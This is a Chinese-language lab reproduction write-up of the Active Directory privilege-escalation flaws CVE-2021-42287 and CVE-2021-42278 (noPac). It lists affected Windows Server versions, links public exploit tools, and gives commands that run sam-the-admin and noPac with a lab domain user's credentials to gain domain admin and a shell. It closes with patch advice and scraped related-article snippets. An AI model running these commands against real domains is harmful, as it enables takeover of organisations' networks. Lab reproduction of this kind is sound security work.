Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)
1.漏洞描述
Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)是由于Active Directory 域服务没有进行适当的安全限制,导致可绕过安全限制进行权限提升。攻击者可利用该漏洞造成将域内的普通用户权限提升到域管理员权限等危害。
2.影响版本
CVE-2021-42287:
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server, version 20H2 (Server Core Installation)
Windows Server, version 2004 (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
CVE-2021-42278:
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server, version 20H2 (Server Core Installation)
Windows Server, version 2004 (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core
3.漏洞利用条件
(1)一个普通域成员帐户
(2)域用户有创建机器用户的权限(一般默认权限)
(3)DC未打补丁KB5008380或KB5008602
4.环境准备
Win7
192.168.42.128
域普通用户:adtest/szg:1234qweR
Win server2008 R2 Standard Service Pack 1
192.168.42.136
域控机器
Kali
192.168.42.138
攻击机器
5.漏洞利用工具
下载地址:
https://github.com/WazeHell/sam-the-admin
https://github.com/Ridter/noPac
6.漏洞复现
sam-the-admin脚本
查看源码,发现脚本实际是实际就是调用两个可执行文件
kali中存在这两个文件的py文件,路径为/usr/local/bin/smbexec.py 和 /usr/local/bin/secretsdump.py
修改代码如下:
安装requirements.txt文件中的python模块
pip3 install -r requirements.txt
执行如下命令进行域服务提权攻击
python3 sam_the_admin.py "adtest/szg:1234qweR" -dc-ip 192.168.42.136 -shell
PS:目前脚本只能在kali环境下运行成功。
noPac脚本
先安装requirements.txt文件中的模块
pip3 install -r requirements.txt
Scanner
python3 scanner.py -use-ldap adtest/szg:1234qweR -dc-ip 192.168.42.136
GetST
python3 noPac.py -use-ldap adtest/szg:1234qweR -dc-ip 192.168.42.136
Auto get shell
python3 noPac.py -use-ldap adtest/szg:1234qweR -dc-ip 192.168.42.136 –shell
7.修复建议
官方已发布漏洞补丁及修复版本,Windows用户可通过Windows update自动更新升级,或通过下述漏洞参考中的链接手动更新。
漏洞参考:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42287
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42278
Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)相关推荐
- linux内核安全数据,【漏洞分析】Linux内核XFRM权限提升漏洞分析预警(CVE–2017–16939)...
0x00 背景介绍 2017年11月24日, OSS社区披露了一个由独立安全研究员Mohamed Ghannam发现的一处存在于Linux 内核Netlink socket子系统(XFRM)的漏洞,漏 ...
- 【域渗透提权】CVE-2020-1472 NetLogon 权限提升漏洞
文章目录 声明 一.漏洞概述 二.漏洞简介 三.影响范围 四.漏洞原理 五.实战攻击测试 POC/EXP攻击.Impacket工具包 使用 Mimikatz 进行攻击测试 六.恢复用户哈希 恢复域控的 ...
- Windows NetLogon权限提升漏洞(CVE-2020-1472)
漏洞描述 微软官方于8月12日发布安全更新,其中修复了一个修复了NetLogon权限提升漏洞(CVE-2020-1472),攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道 ...
- 【Windows Server 2019】活动目录 (Active Directory) ——安装Acitve Directory域服务和提升为域控制器
目录 5. 安装 Active Directory 域服务 实验目的 5.1 配置服务器的IP地址 5.2 安装Active Diretory服务 (1)添加角色和功能 (2)进入[开始之前]界面 ( ...
- CVE-2020-1472 Netlogon权限提升漏洞分析
一.漏洞信息 1. 漏洞简述 漏洞名称:Netlogon 权限提升漏洞 漏洞编号:CVE-2020-1472 漏洞类型:权限提升 CVSS评分:10 利用难度:简单 基础用户:不需要 2. 组件概述 ...
- netlogon启动后停止_【通告更新】漏洞EXP已流出,影响巨大,微软NetLogon权限提升漏洞安全风险通告第三次更新...
近日,奇安信CERT监测到国外安全厂商发布了NetLogon 权限提升漏洞(CVE-2020-1472)的详细技术分析文章和验证脚本.此漏洞是微软8月份发布安全公告披露的紧急漏洞,CVSS漏洞评分10 ...
- CVE-2021-3560 Polkit权限提升漏洞复现与分析
0x00 简介 Polkit是Linux上的一个系统服务,其用于实现权限管理,通过给非特权进程授权,允许具有特权的进程(或者库文件lib)给非特权进程提供服务,由于Polkit被systemd使用,所 ...
- linux ssh权限漏洞,OpenSSH do_setup_env函数权限提升漏洞(CVE-2015-8325)
OpenSSH do_setup_env函数权限提升漏洞(CVE-2015-8325) 发布日期:2016-05-02 更新日期:2016-05-04 受影响系统:OpenSSH OpenSSH &l ...
- windows dns配置文件在哪_搭建基于Windows的域服务与文件服务(一)——搭建Windows域服务...
Windows的域服务,准确来说应该叫Windows活动目录,是网络环境下各个Windows服务端.客户端的一种组织管理形式,利用Windows域服务,可以有效地对组织内的Windows电脑进行统一的 ...
- CVE-2020-1472NetLogon权限提升漏洞
0x01 概述 2020年8月12日,阿里云应急响应中心监测到微软发布补丁修复了NetLogon权限提升漏洞(CVE-2020-1472),CVSS评分10,官方评级严重.攻击者通过NetLogon( ...
最新文章
- 低头是家和月光,抬头是车和远方
- jdbc template 学习总结
- [Java基础]模块化概述
- [react] React组件的构造函数有什么作用?
- C++静态联编与动态联编
- sendRedirec forward
- python程序实例讲解_python入门编程实例 python入门编程实例解析
- 关于RealProxy
- PMP-8. 项目经理的能力
- hdu2203java_HDU2203(KMP入门题)
- C语言一般考点笔试,c语言常见笔试题及答案
- 读书寄语:所有的遇见都是有原因的,并不只是偶然
- python数字转中文_阿拉伯数字转换为中文数字的python实现
- 做事很乱没有条理性,如何让自己做事更有条理?
- 【vcpkg】POCO库编译链接总结
- con和com开头单词规律_英语单词太多记不住?巧用思维导图打开单词记忆新大门...
- 【Guacamole中文文档】二、用户指南 —— 1.实现和架构
- pfSense设置入网门户
- 《嵌入式 - 嵌入式大杂烩》详解常见的二极管
- DVWA爆破high等级与token机制介绍(附防爆破措施)